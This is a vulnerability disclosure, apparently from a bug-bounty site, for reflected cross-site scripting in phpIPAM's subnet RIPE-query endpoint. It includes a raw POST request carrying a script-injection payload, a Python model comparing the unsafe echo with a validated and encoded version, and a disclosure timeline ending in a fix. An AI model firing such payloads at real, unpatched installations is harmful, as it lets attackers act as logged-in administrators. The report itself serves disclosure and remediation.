Cross-site Scripting (XSS) - Reflected in phpipam/phpipam

Valid

Reported on Jan 28th 2022


Description

Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application into the victim's browser. The script is delivered through a link that sends a request to a vulnerable page, which echoes the script back so that it executes. The vulnerability is typically the result of incoming request parameters not being sufficiently validated or encoded, which allows an attacker to manipulate the web application's functions and trigger execution of malicious scripts.

Proof of Concept

Steps to Reproduce:
1. Log in to the web application using admin credentials.
2. Navigate to Subnets: "http://localhost/phpipam/index.php?page=subnets&section=1"
3. Choose any subnet and click Edit.
4. Click the "Get Information" button of the Subnet input field, capture the request using a proxy tool, and change the subnet IP to the XSS payload, as shown in the POST request below.

=======================================================================================

POST /phpipam/app/admin/subnets/ripe-query.php HTTP/1.1
Host: localhost
Content-Length: 47
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Cookie: phpipam=keqtftn3sihc7kbu6m79rdlis0;
Connection: close

subnet=<script>alert(document.domain);</script>

Impact

Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
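The defect behind this report is a request parameter (`subnet`) that the RIPE-query endpoint echoes into its response without validating it or encoding the output. The following Python model is an added example, not phpIPAM code and not the content of fix commit 47c104: it places the unsafe reflection next to a hardened handler that allowlists the value as an IP network with the standard `ipaddress` module and HTML-encodes anything it echoes, then runs both against the payload from the PoC.

```python
import html
import ipaddress
from typing import Optional

# Payload taken from the POST body in the report above.
XSS_PAYLOAD = "<script>alert(document.domain);</script>"


def render_vulnerable(subnet: str) -> str:
    """Model of the unsafe pattern: the request parameter is echoed
    straight into the HTML response, so a <script> tag is executed."""
    return f"<h4>Information for subnet {subnet}</h4>"


def validate_subnet(subnet: str) -> Optional[str]:
    """Allowlist check: accept only something that parses as an IPv4/IPv6
    network (a bare host address becomes a /32 or /128) and return it in
    canonical form. Anything else, including HTML, is rejected with None."""
    try:
        return str(ipaddress.ip_network(subnet.strip(), strict=False))
    except ValueError:
        return None


def render_hardened(subnet: str) -> str:
    """Validate first, then HTML-encode whatever is echoed back. Encoding
    is defence in depth for the error branch, which still has to show the
    attacker-controlled string to the user."""
    valid = validate_subnet(subnet)
    if valid is None:
        safe = html.escape(subnet, quote=True)
        return f"<div class='alert'>Invalid subnet: {safe}</div>"
    return f"<h4>Information for subnet {html.escape(valid)}</h4>"


def contains_live_script(rendered: str) -> bool:
    """Crude response check: does an unescaped <script> tag survive?"""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(XSS_PAYLOAD))
    print("hardened:  ", render_hardened(XSS_PAYLOAD))
    print("valid input:", render_hardened("10.0.0.5/24"))
```

The canonicalisation step also means a value like `10.0.0.5/24` is echoed as `10.0.0.0/24`, so the response never contains bytes the attacker chose.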

We are processing your report and will contact the phpipam team within 24 hours. a year ago
We have contacted a member of the phpipam team and are waiting to hear back a year ago
We have sent a follow up to the phpipam team. We will try again in 7 days. a year ago
We have sent a second follow up to the phpipam team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the phpipam team. This report is now considered stale. a year ago
phpipam/phpipam maintainer has acknowledged this report a year ago
garyallan modified the report a year ago
garyallan modified the report a year ago
garyallan validated this vulnerability a year ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
AggressiveUser (Researcher), a year ago:

@admin @maintainer can you assign CVE ID if it’s possible for this report

Jamie Slome (Admin), a year ago:

We sure can, we just need confirmation from the maintainer before we proceed with a CVE.

@maintainer - are you happy for us to assign and publish a CVE for this report?

garyallan marked this as fixed in 1.5.0 with commit 47c104 a year ago
garyallan has been awarded the fix bounty
This vulnerability will not receive a CVE